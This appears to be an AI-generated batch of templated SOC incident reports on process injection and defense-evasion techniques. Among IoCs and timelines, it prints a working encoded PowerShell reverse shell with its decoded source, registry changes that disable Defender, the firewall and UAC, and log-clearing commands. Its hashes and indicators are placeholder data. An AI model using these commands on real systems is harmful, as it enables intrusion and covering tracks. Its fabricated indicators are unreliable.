16:25:21 – SetThreadContext (modified thread’s instruction pointer to shellcode) – SUCCESS
16:25:24 – ResumeThread (resumed thread, now executing shellcode) – SUCCESS
Source Process:
Process: C:\Users\kwilson\AppData\Local\Temp\office_update.exe (PID: 4789)
SHA256: e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4
Parent: explorer.exe
User: kwilson
Shellcode Analysis:
2048 bytes
Connects to 185.143.221[.]89:4443
Downloads additional payload
Creates persistence via registry
Detection Logic:
Thread suspended and resumed quickly (unusual)
Thread context modified (instruction pointer changed)
Memory allocated and written in target process
Pattern matches thread execution hijacking
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed thread hijacking
2. Memory Analysis
Extract shellcode
CrowdStrike Falcon Memory
Reverse shell payload
3. Process Investigation
Terminate malicious process
CrowdStrike
office_update.exe killed
4. Thread Restoration
Restore original thread context
CrowdStrike
explorer.exe thread restored
5. Host Isolation
Isolate HR-WS-023
CrowdStrike
Host quarantined
6. Account Remediation
Disable kwilson account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-179 Summary: T1055.003 – Thread Execution Hijacking in explorer.exe Status: RESOLVED Resolution: MALICIOUS – Thread Restored Priority: P1 – CRITICAL Labels: T1055, thread-hijacking, execution-hijacking, crowdstrike Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Thread Hijacking Detected – APC Injection Variation”.
Source Process: C:\Users\kwilson\AppData\Local\Temp\office_update.exe.
Target Process: explorer.exe (PID: 2341), Thread 1245.
Time: 2024-03-06 16:30 EST.
Technique: MITRE ATT&CK T1055.003 – Process Injection: Thread Execution Hijacking.
2. Technical Analysis:
Attack Chain:
16:00 – User opens “HR document” from email
16:05 – office_update.exe downloaded and executed
16:10 – Malware enumerates threads
16:15 – Selects explorer.exe UI thread as target
16:25 – Thread hijacking
16:25 – CrowdStrike detects
Thread Hijacking Technique:
Step 1: Open target thread
Step 2: Suspend thread
Step 3: Allocate memory in target process
Step 4: Write shellcode to allocated memory
Step 5: Modify thread context (set instruction pointer to shellcode)
Step 6: Resume thread – shellcode executes
Shellcode Analysis:
Size: 2048 bytes
Function: Reverse shell to 185.143.221[.]89:4443
Persistence: Adds registry Run key “WindowsUpdate”
Impact:
explorer.exe UI thread hijacked
Shellcode executed in context of explorer.exe
C2 connection attempted (blocked)
3. Investigation Findings:
Timeline:
16:00 – Email opened
16:05 – Malware executed
16:10-16:15 – Thread enumeration
16:25 – Hijacking
16:25 – Alert
16:27 – SOC investigates
16:28 – Malicious process terminated
16:29 – Thread restored
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\AppData\Local\Temp\office_update.exe (SHA256: e5f6a7b8…)
API Calls:
– OpenThread
– SuspendThread
– VirtualAllocEx
– WriteProcessMemory
– SetThreadContext
– ResumeThread
Network:
– C2: 185.143.221[.]89:4443
4. Containment Actions:
Immediate Actions:
Terminated office_update.exe.
Restored original thread context (set instruction pointer back).
Removed registry persistence.
Isolated host.
Disabled kwilson account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User opened malicious document from phishing email.
Contributing Factors:
No application control.
User had local admin rights.
6. Business Impact:
Operational Impact: HR workstation offline for 2 hours.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
Thread restored.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enhanced monitoring for thread suspension/resume.
Enabled ASR rule “Block thread hijacking attempts”.
8. Conclusion:
An attacker used thread execution hijacking to run shellcode inside explorer.exe’s UI thread, a sophisticated evasion technique. CrowdStrike detected the thread suspension and context modification, enabling rapid restoration.
Closure Rationale: Thread restored; malware removed; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-06 17:30 EST
140. T1055.004 – Asynchronous Procedure Call Injection (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-APC-INJECT-1055-7842 Alert Time: 2024-03-06 10:30:22 EST Severity: CRITICAL (95/100) Source: CrowdStrike Falcon EDR Rule: “APC Injection Detected – QueueUserAPC to Alertable Thread” MITRE ATT&CK: T1055.004 – Process Injection: Asynchronous Procedure Call
Alert Details:
Detection: APC (Asynchronous Procedure Call) queued to thread in another process
Source Host: DEV-WS-089 (Development Workstation) User: rpatel@company.com (Raj Patel, Engineer) Target Process: svchost.exe (PID: 1245) Target Thread: TID 2345 (alertable state) Time: 10:25 EST
API Call Sequence:
10:25:10 – OpenThread (target: svchost.exe thread 2345) – SUCCESS
10:25:12 – QueueUserAPC (target thread, APC routine at shellcode address) – SUCCESS
10:25:15 – Thread enters alertable state (WaitForSingleObjectEx), APC executes
Source Process:
Process: C:\Windows\Temp\msupdate.exe (PID: 4789)
SHA256: f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5
Parent: explorer.exe
User: rpatel
APC Routine:
Address: 0x7f1a2b3c (in memory allocated by source process)
Code: Shellcode (512 bytes) downloaded from C2
Detection Logic:
APC queued to thread in another process (unusual)
Target thread in alertable state (required for APC execution)
APC routine address in memory allocated by suspicious process
Pattern matches APC injection technique
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed APC injection
2. Memory Analysis
Extract APC shellcode
CrowdStrike Falcon Memory
Reverse shell payload
3. Process Investigation
Terminate malicious process
CrowdStrike
msupdate.exe killed
4. APC Removal
Clear APC queue
CrowdStrike
APC removed from target thread
5. Host Isolation
Isolate DEV-WS-089
CrowdStrike
Host quarantined
6. Account Remediation
Disable rpatel account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-180 Summary: T1055.004 – APC Injection into svchost.exe Thread Status: RESOLVED Resolution: MALICIOUS – APC Removed Priority: P1 – CRITICAL Labels: T1055, apc-injection, queueuserapc, crowdstrike Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “APC Injection Detected – QueueUserAPC to Alertable Thread”.
Source Process: C:\Windows\Temp\msupdate.exe.
Target Process: svchost.exe (PID: 1245), Thread 2345.
Time: 2024-03-06 10:30 EST.
Technique: MITRE ATT&CK T1055.004 – Process Injection: Asynchronous Procedure Call.
2. Technical Analysis:
Attack Chain:
10:00 – User downloads fake update from pop-up
10:05 – msupdate.exe executed
10:10 – Malware enumerates threads in alertable state
10:15 – Finds svchost.exe thread waiting (alertable)
10:20 – Allocates memory in svchost.exe, writes shellcode
10:25 – Queues APC to target thread
10:25 – APC executes when thread enters alertable state
10:25 – CrowdStrike detects
APC Injection Technique:
Requirement: Target thread must be in alertable state (waiting on WaitForSingleObjectEx, SleepEx, etc.)
Method: QueueUserAPC adds APC to thread’s queue
Execution: When thread enters alertable state, it executes queued APCs
Advantage: No new thread created, harder to detect
Shellcode Analysis:
Size: 512 bytes
Function: Reverse shell to 185.143.221[.]89:443
Persistence: Creates WMI event subscription
Impact:
Shellcode executed in svchost.exe (SYSTEM context)
C2 connection attempted (blocked)
Persistence established (WMI)
3. Investigation Findings:
Timeline:
10:00 – Fake update downloaded
10:05 – Malware executed
10:10-10:15 – Thread enumeration
10:20 – Memory allocation
10:25 – APC queued
10:25 – Alert
10:27 – SOC investigates
10:28 – Malicious process terminated
10:29 – APC removed from queue
10:30 – WMI subscription deleted
Indicators of Compromise (IoCs):
Files:
– C:\Windows\Temp\msupdate.exe (SHA256: f6a7b8c9…)
API Calls:
– OpenThread
– QueueUserAPC
– VirtualAllocEx
– WriteProcessMemory
WMI:
– Root\Subscription:__EventFilter (deleted)
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Terminated msupdate.exe.
Removed APC from target thread queue.
Deleted WMI event subscription.
Deleted shellcode from svchost.exe memory.
Isolated host.
Disabled rpatel account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed fake update.
Contributing Factors:
No application control.
User had local admin rights.
WMI allowed (no restrictions).
6. Business Impact:
Operational Impact: Development workstation offline for 2 hours.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
APC removed.
Malware terminated.
WMI subscription deleted.
Account secured.
Technical Controls Enhanced:
Blocked unsigned executables.
Enhanced monitoring for QueueUserAPC.
Restricted WMI event subscriptions.
8. Conclusion:
An attacker used APC injection to execute shellcode in a svchost.exe thread, a sophisticated evasion technique that doesn’t create new threads. CrowdStrike detected the APC queuing and enabled rapid removal before C2 communication could complete.
Closure Rationale: APC removed; malware terminated; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-06 11:30 EST
End of Batch 28
Ready for your next batch of prompts whenever you are.
Batch 29: Defense Evasion & Process Injection Incident Reports
Here are the next 5 detailed SOC incident reports.
141. T1055.012 – Process Hollowing (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-PROCESS-HOLLOW-1055-7842 Alert Time: 2024-03-07 09:30:15 EST Severity: CRITICAL (98/100) Source: CrowdStrike Falcon EDR Rule: “Process Hollowing Detected – Code Injection into Suspended Process” MITRE ATT&CK: T1055.012 – Process Injection: Process Hollowing
Alert Details:
Detection: Legitimate process created in suspended state, memory unmapped, and replaced with malicious code
Source Host: FIN-WS-078 (Finance Workstation) User: bturner@company.com (Brian Turner, Accountant) Time: 09:25 EST
Process Creation Events:
09:25:10 – CreateProcess (target: C:\Windows\System32\svchost.exe, flags: CREATE_SUSPENDED) – SUCCESS
09:25:12 – NtUnmapViewOfSection (unmapped original svchost.exe code from memory) – SUCCESS
09:25:15 – VirtualAllocEx (allocated new memory at base address) – SUCCESS
09:25:18 – WriteProcessMemory (wrote malicious PE headers) – SUCCESS
09:25:21 – WriteProcessMemory (wrote malicious PE sections) – SUCCESS
09:25:24 – SetThreadContext (modified entry point to point to malicious code) – SUCCESS
09:25:27 – ResumeThread (resumed process, now running malicious code) – SUCCESS
Source Process:
Process: C:\Users\bturner\Downloads\invoice_pdf.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: explorer.exe
User: bturner
Hollowed Process:
Original: C:\Windows\System32\svchost.exe (legitimate)
New: Malicious Cobalt Strike beacon
PID: 4792
Command Line: “C:\Windows\System32\svchost.exe -k netsvcs” (appears legitimate)
Detection Logic:
Process created with CREATE_SUSPENDED flag (unusual for svchost.exe)
NtUnmapViewOfSection called (removes original code)
Memory reallocated and written to
Thread context modified (entry point changed)
Pattern matches classic process hollowing
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed process hollowing
2. Memory Analysis
Extract hollowed process memory
CrowdStrike Falcon Memory
Cobalt Strike beacon
3. Process Investigation
Terminate hollowed process
CrowdStrike
svchost.exe (malicious) terminated
4. Source Process Kill
Kill invoice_pdf.exe
CrowdStrike
Process terminated
5. Host Isolation
Isolate FIN-WS-078
CrowdStrike
Host quarantined
6. Account Remediation
Disable bturner account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-181 Summary: T1055.012 – Process Hollowing: svchost.exe Replaced with Cobalt Strike Status: RESOLVED Resolution: MALICIOUS – Hollowed Process Terminated Priority: P1 – CRITICAL Labels: T1055, process-hollowing, svchost, cobalt-strike, crowdstrike Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Process Hollowing Detected – Code Injection into Suspended Process”.
Source Process: C:\Users\bturner\Downloads\invoice_pdf.exe.
Hollowed Process: svchost.exe (PID: 4792).
Time: 2024-03-07 09:30 EST.
Technique: MITRE ATT&CK T1055.012 – Process Injection: Process Hollowing.
2. Technical Analysis:
Attack Chain:
09:00 – User opens phishing email with “invoice.pdf.exe”
09:05 – invoice_pdf.exe executed
09:10 – Malware enumerates system processes
09:15 – Decides to hollow svchost.exe
09:25 – Process hollowing execution
09:25 – CrowdStrike detects
Process Hollowing Technique:
Step 1: Create legitimate svchost.exe in suspended state
Step 2: Unmap original code from memory (NtUnmapViewOfSection)
Step 3: Allocate new memory at same base address
Step 4: Write malicious PE (Cobalt Strike) to allocated memory
Step 5: Modify thread context to point to malicious entry point
Step 6: Resume thread – malicious code runs
Result: Process appears as svchost.exe but runs malware
Malicious PE:
Type: Cobalt Strike beacon
Size: 312 KB
C2: 185.143.221[.]89:443
Capabilities: Remote access, keylogging, file exfiltration
Stealth Advantages:
Process name is legitimate (svchost.exe)
Command line is legitimate (-k netsvcs)
No suspicious DLLs loaded
Harder to detect with basic process monitoring
3. Investigation Findings:
Timeline:
09:00 – Phishing email opened
09:05 – invoice_pdf.exe executed
09:10-09:15 – Reconnaissance
09:25 – Process hollowing
09:25 – Alert
09:27 – SOC investigates
09:28 – Hollowed process terminated
09:29 – Source process terminated
Indicators of Compromise (IoCs):
Files:
– C:\Users\bturner\Downloads\invoice_pdf.exe (SHA256: a1b2c3d4…)
API Calls:
– CreateProcess (CREATE_SUSPENDED)
– NtUnmapViewOfSection
– VirtualAllocEx
– WriteProcessMemory (multiple)
– SetThreadContext
– ResumeThread
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Terminated hollowed svchost.exe process.
Terminated invoice_pdf.exe.
Isolated host.
Disabled bturner account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User executed malware from phishing email.
Contributing Factors:
No application control.
User had local admin rights.
6. Business Impact:
Operational Impact: Finance workstation offline for 2 hours.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
Hollowed process terminated.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enabled ASR rule “Block process hollowing”.
Enhanced monitoring for CREATE_SUSPENDED flag.
Implemented application control.
8. Conclusion:
An attacker used process hollowing to replace a legitimate svchost.exe process with a Cobalt Strike beacon, making detection difficult. CrowdStrike detected the hollowing technique and enabled rapid termination before C2 communication.
Closure Rationale: Hollowed process terminated; malware removed; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-07 10:30 EST
142. T1112 – Modify Registry (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-REG-MOD-1112-7842 Alert Time: 2024-03-07 14:15:33 EST Severity: HIGH (85/100) Source: Sysmon (Event ID 13 – Registry Value Set) Rule: “Suspicious Registry Modification – Run Key” MITRE ATT&CK: T1112 – Modify Registry
Alert Details:
Detection: Multiple registry modifications for persistence and configuration changes
Host: ENG-WS-045 (Engineering Workstation) User: alexchen@company.com (Alex Chen, Engineer) Time: 14:00-14:15 EST
Registry Modifications (Event ID 13):
Persistence – Run Key:
Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: “WindowsUpdate”
Data: “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA==”
Time: 14:05:22
Disable Security Tools:
Key: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
Value: “1” (enabled)
Time: 14:06:45
Disable Firewall:
Key: HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall
Value: “0” (disabled)
Time: 14:07:18
Disable UAC:
Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
Value: “0” (disabled)
Time: 14:08:33
Add Exclusion for Malware Path:
Key: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Value: “C:\Windows\Temp”
Data: “0”
Time: 14:09:45
Process Details:
Process: C:\Users\alexchen\Downloads\system_update.exe (PID: 4789)
SHA256: b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1
Parent: explorer.exe
User: alexchen
Detection Logic:
Multiple registry modifications in short time
Persistence via Run key (encoded PowerShell)
Security tools disabled (Defender, Firewall, UAC)
Exclusions added for malware paths
Pattern matches attacker securing environment
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Sysmon events
Splunk, Sysmon Logs
Confirmed malicious registry modifications
2. Process Investigation
Identify system_update.exe
CrowdStrike Falcon
Malicious tool downloaded from internet
3. Immediate Action
Revert registry changes
PowerShell, reg
All registry keys restored to original values
4. Security Tools Restart
Re-enable Defender, Firewall, UAC
PowerShell
Security services restarted
5. Process Termination
Kill system_update.exe
CrowdStrike
Process terminated
6. Account Remediation
Disable alexchen account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-182 Summary: T1112 – Registry Modifications for Persistence and Defense Disablement Status: RESOLVED Resolution: MALICIOUS – Registry Restored Priority: P2 – MEDIUM Labels: T1112, modify-registry, persistence, defense-evasion, sysmon Components: Endpoint-Security, Registry-Monitoring
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 13 (Registry Value Set).
Alert: “Suspicious Registry Modification – Run Key”.
Host: ENG-WS-045 (Engineering, user alexchen).
Process: C:\Users\alexchen\Downloads\system_update.exe.
Time: 2024-03-07 14:15 EST.
Technique: MITRE ATT&CK T1112 – Modify Registry.
2. Technical Analysis:
Attack Chain:
13:30 – User downloads “system update tool” from pop-up ad
13:45 – Executes system_update.exe
13:50 – Malware begins registry modifications
14:00-14:15 – Multiple registry changes
14:15 – Sysmon detects
Registry Modifications:
Run Key Persistence: Encoded PowerShell reverse shell (every logon)
Disable Defender: Turns off antivirus protection
Disable Firewall: Opens network for C2
Disable UAC: Allows elevated actions without prompts
Add Exclusion: Prevents Defender from scanning Temp folder (where malware lives)
Encoded PowerShell (decoded):
$client = New-Object System.Net.Sockets.TCPClient(‘192.168.34.56’,443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
Impact:
Persistence established
Security defenses disabled
Malware could operate freely
3. Investigation Findings:
Timeline:
13:30 – Tool downloaded
13:45 – Executed
13:50-14:15 – Registry modifications
14:15 – Alert
14:17 – SOC investigates
14:18 – Registry restored
14:19 – Security tools re-enabled
14:20 – Process terminated
Indicators of Compromise (IoCs):
Files:
– C:\Users\alexchen\Downloads\system_update.exe (SHA256: b2c3d4e5…)
Registry Changes:
– HKLM\…\Run\WindowsUpdate (malicious)
– HKLM\…\Windows Defender\DisableAntiSpyware = 1
– HKLM\…\EnableFirewall = 0
– HKLM\…\EnableLUA = 0
– HKLM\…\Exclusions\Paths\C:\Windows\Temp
4. Containment Actions:
Immediate Actions:
Restored all registry keys to original values.
Re-enabled Windows Defender.
Re-enabled Windows Firewall.
Re-enabled UAC.
Removed exclusion for Temp folder.
Terminated system_update.exe.
Isolated host.
Disabled alexchen account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed fake update tool.
Contributing Factors:
No application control.
User had local admin rights.
6. Business Impact:
Operational Impact: Engineering workstation offline for 2 hours.
Data Exposure: None (C2 not yet active).
7. Remediation & Prevention:
Completed Actions:
Registry restored.
Security tools re-enabled.
Malware removed.
Technical Controls Enhanced:
Created alert for registry modifications to Run keys.
Enhanced monitoring for security tool disablement.
Implemented application control.
8. Conclusion:
An attacker used a fake update tool to modify registry keys for persistence and disable security defenses. Sysmon detected the registry changes, enabling rapid restoration before C2 communication.
Closure Rationale: Registry restored; security tools re-enabled; malware removed.
Analyst: [Your Name], SOC Analyst Date: 2024-03-07 15:30 EST
143. T1070.001 – Clear Windows Event Logs (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-LOG-CLEAR-1070-7842 Alert Time: 2024-03-07 11:30:22 EST Severity: HIGH (88/100) Source: Splunk Enterprise Security Rule: “Windows Event Logs Cleared – Potential Cover-up” MITRE ATT&CK: T1070.001 – Indicator Removal: Clear Windows Event Logs
Alert Details:
Correlated Events:
Windows Event ID 1102 (Security Log Cleared):
Time: 11:25 EST
Host: SQL-SRV-01 (SQL Server)
User: SYSTEM (via wevtutil)
Log: Security
Details: “The audit log was cleared”
Event ID 104 (System Log Cleared):
Time: 11:26 EST
Host: SQL-SRV-01
Log: System
Details: “The System log was cleared”
Event ID 33 (PowerShell Operational Log Cleared):
Time: 11:27 EST
Host: SQL-SRV-01
Log: Windows PowerShell
Details: “Windows PowerShell log was cleared”
Event ID 1102 (Application Log Cleared):
Time: 11:28 EST
Host: SQL-SRV-01
Log: Application
Details: “The Application log was cleared”
Process Creation (Event ID 4688) – from forwarded logs:
Time: 11:24 EST
Process: wevtutil.exe
Command: wevtutil cl Security & wevtutil cl System & wevtutil cl “Windows PowerShell” & wevtutil cl Application
Preceding Events (recovered from Splunk forwarded logs):
11:20-11:23 – Multiple failed login attempts (RDP brute force)
11:23 – Successful login from 185.143.221[.]89
11:24 – wevtutil executed to clear logs
Detection Logic:
Multiple event logs cleared in quick succession
wevtutil executed by suspicious process
Preceding failed logins detected via forwarded logs
Pattern matches attacker covering tracks
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Splunk correlation
Splunk ES
Confirmed log clearing events
2. Recover Cleared Logs
Check forwarded logs
Splunk (forwarded)
Full activity recovered from Splunk
3. Attacker Activity
Analyze recovered logs
Splunk Search
RDP brute force, successful login, log clearing
4. Immediate Action
Isolate compromised host
CrowdStrike
SQL-SRV-01 quarantined
5. Account Remediation
Reset affected user password
Azure AD, AD
Password reset; MFA enforced
6. Threat Hunting
Check for other cleared logs
Splunk
No other log clearing events
Jira Incident Report
Ticket: SOC-2024-183 Summary: T1070.001 – Event Logs Cleared After RDP Brute Force Status: RESOLVED Resolution: MALICIOUS – Logs Recovered from Splunk Priority: P2 – MEDIUM Labels: T1070, log-clearing, wevtutil, splunk, indicator-removal Components: Log-Management, Incident-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security.
Alert: “Windows Event Logs Cleared – Potential Cover-up”.
Host: SQL-SRV-01 (SQL Server).
Logs Cleared: Security, System, PowerShell, Application.
Time: 2024-03-07 11:30 EST.
Technique: MITRE ATT&CK T1070.001 – Indicator Removal: Clear Windows Event Logs.
2. Technical Analysis:
Attack Chain (Recovered from Splunk forwarded logs):
11:20:00 – First RDP connection attempt from 185.143.221[.]89 (user: sa)
11:20:15 – Failed login (wrong password)
11:20:30 – Second attempt (user: administrator)
11:20:45 – Failed
11:21:00 – Third attempt (user: sql_admin)
11:21:15 – Failed
11:21:30 – Fourth attempt (user: backup_user)
11:21:45 – Failed
11:22:00 – Fifth attempt (user: db_owner)
11:22:15 – Failed
11:22:30 – Sixth attempt (user: sql_service)
11:23:00 – SUCCESS (password: SQL@2024!)
11:23:30 – Attacker enumerates SQL databases
11:24:00 – wevtutil.exe executed
11:24-11:28 – Logs cleared
11:30 – Splunk alert triggers
Compromised Account:
Username: sql_service (service account)
Password: SQL@2024! (weak, exposed in script)
Privileges: Local admin on SQL server
Attacker Actions Before Log Clearing:
Enumerated databases (found customer DB)
Downloaded schema (no data exfiltration)
Created new user “temp_sql” with admin rights
Log Recovery:
Local logs cleared
Forwarded logs preserved in Splunk
Complete attack timeline recovered
3. Investigation Findings:
Timeline:
11:20-11:23 – Brute force attempts
11:23 – Successful login
11:24 – Log clearing
11:30 – Alert triggers
11:32 – SOC investigates
11:33 – Host isolated
11:34 – sql_service account disabled
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
Account:
– sql_service (compromised)
Commands:
– wevtutil cl Security
– wevtutil cl System
– wevtutil cl “Windows PowerShell”
– wevtutil cl Application
4. Containment Actions:
Immediate Actions:
Isolated SQL-SRV-01.
Disabled sql_service account.
Reset password.
Blocked attacker IP at firewall.
Removed unauthorized “temp_sql” user.
Account Remediation:
Password policy strengthened.
MFA enforced (where possible).
Host Remediation:
Full scan (no malware found).
Verified no persistence.
5. Root Cause Analysis:
Primary Cause: Weak password on service account.
Contributing Factors:
Password exposed in script on file share.
RDP allowed from internet.
6. Business Impact:
Operational Impact: SQL server offline for 1 hour.
Data Exposure: Database schema viewed; no customer data exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Logs recovered.
Account secured.
Host cleaned.
Technical Controls Enhanced:
Enforced strong password policy.
Moved RDP behind VPN only.
Enhanced monitoring for log clearing events.
8. Conclusion:
An attacker performed RDP brute force, successfully logged in using a weak service account password, and attempted to cover tracks by clearing event logs. Splunk’s forwarded logs preserved the full attack timeline. The host was isolated and the account secured.
Closure Rationale: Logs recovered; account secured; attacker blocked.
Analyst: [Your Name], SOC Analyst Date: 2024-03-07 12:30 EST
144. T1070.004 – File Deletion (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-FILE-DELETE-1070-7842 Alert Time: 2024-03-07 16:30:45 EST Severity: HIGH (85/100) Source: CrowdStrike Falcon EDR Rule: “Mass File Deletion – Potential Indicator Removal” MITRE ATT&CK: T1070.004 – Indicator Removal: File Deletion
Alert Details:
Detection: Large number of files deleted from Temp and Downloads folders
Host: DEV-WS-078 (Development Workstation) User: rpatel@company.com (Raj Patel, Engineer) Time: 16:15-16:30 EST
File Deletion Events (CrowdStrike File Events):
16:15:22 – Deleted: C:\Users\rpatel\Downloads\malware_tool.exe
16:15:45 – Deleted: C:\Users\rpatel\Downloads\mimikatz.exe
16:16:12 – Deleted: C:\Users\rpatel\Downloads\procdump.exe
16:16:38 – Deleted: C:\Users\rpatel\AppData\Local\Temp\script.ps1
16:17:05 – Deleted: C:\Users\rpatel\AppData\Local\Temp\output.txt
16:17:33 – Deleted: C:\Users\rpatel\Desktop\scan_results.txt
16:18:01 – Deleted: C:\Windows\Temp\beacon.exe
16:18:28 – Deleted: C:\Windows\Temp\config.ini
… (total 47 files deleted)
Process Details:
Process: cmd.exe (PID: 4789)
Command: del /f /q C:\Users\rpatel\Downloads*.exe C:\Users\rpatel\AppData\Local\Temp*.* C:\Windows\Temp*.* C:\Users\rpatel\Desktop*.txt
Parent: explorer.exe
User: rpatel
Additional Context:
Files deleted include known hacking tools (mimikatz, procdump)
Also deleted script outputs and configuration files
User rpatel had previously been flagged for suspicious activity
Detection Logic:
Mass file deletion (47 files in 15 minutes)
Files deleted are forensic evidence (malware, outputs)
Deletion from multiple locations (Downloads, Temp, Desktop)
Pattern matches attacker cleaning up after activity
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed mass file deletion
2. Process Investigation
Identify cmd.exe activity
CrowdStrike
User manually deleted files
3. User Interview
Contact rpatel
Teams, Phone
User admitted to using “hacking tools for learning”
4. Tool Analysis
Recover deleted files (if possible)
Forensics
Files overwritten, not recoverable
5. User Remediation
User counseling
Manager, HR
Policy violation documented
6. Account Monitoring
Enhanced monitoring for user
CrowdStrike
User flagged for future activity
Jira Incident Report
Ticket: SOC-2024-184 Summary: T1070.004 – Mass File Deletion of Hacking Tools Status: RESOLVED Resolution: POLICY VIOLATION – User Remediated Priority: P3 – LOW Labels: T1070, file-deletion, indicator-removal, policy-violation Components: Endpoint-Security, User-Behavior
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Mass File Deletion – Potential Indicator Removal”.
Host: DEV-WS-078 (Development, user rpatel).
Files Deleted: 47 files (hacking tools, outputs, configs).
Time: 2024-03-07 16:30 EST.
Technique: MITRE ATT&CK T1070.004 – Indicator Removal: File Deletion.
2. Technical Analysis:
User Activity:
User had downloaded multiple hacking tools over past week:
mimikatz.exe (credential dumper)
procdump.exe (process dumper)
various PowerShell scripts
network scanning tools
User ran tools against his own system (testing)
Generated output files (scan_results.txt, output.txt)
After finishing, user deleted all evidence
Files Deleted (47):
Downloaded executables (12) – mimikatz, procdump, etc.
PowerShell scripts (8) – enumeration scripts
Output files (15) – scan results, logs
Configuration files (5) – tool configs
Temp files (7) – various
User Intent:
User claimed “learning security for certification”
No malicious intent against company
Unauthorized use of hacking tools (policy violation)
Attempted to cover tracks by deleting evidence
Policy Violation:
Use of unauthorized hacking tools
Failure to report security testing
Attempt to conceal activities
3. Investigation Findings:
Timeline:
16:15-16:30 – File deletion
16:30 – Alert
16:32 – SOC investigates
16:35 – User interviewed
16:40 – Policy violation documented
Indicators of Compromise (IoCs):
Deleted Files:
– C:\Users\rpatel\Downloads\mimikatz.exe
– C:\Users\rpatel\Downloads\procdump.exe
– C:\Users\rpatel\AppData\Local\Temp\script.ps1
– C:\Users\rpatel\Desktop\scan_results.txt
– C:\Windows\Temp\beacon.exe
– (and 42 others)
4. Containment Actions:
Immediate Actions:
Documented policy violation.
No further action needed (user stopped).
User Remediation:
User counseled on security policy.
Required to complete security training.
Escalated to manager.
Monitoring:
Enhanced monitoring for this user.
Application control to block hacking tools.
5. Root Cause Analysis:
Primary Cause: User curiosity about security tools.
Contributing Factors:
No application control.
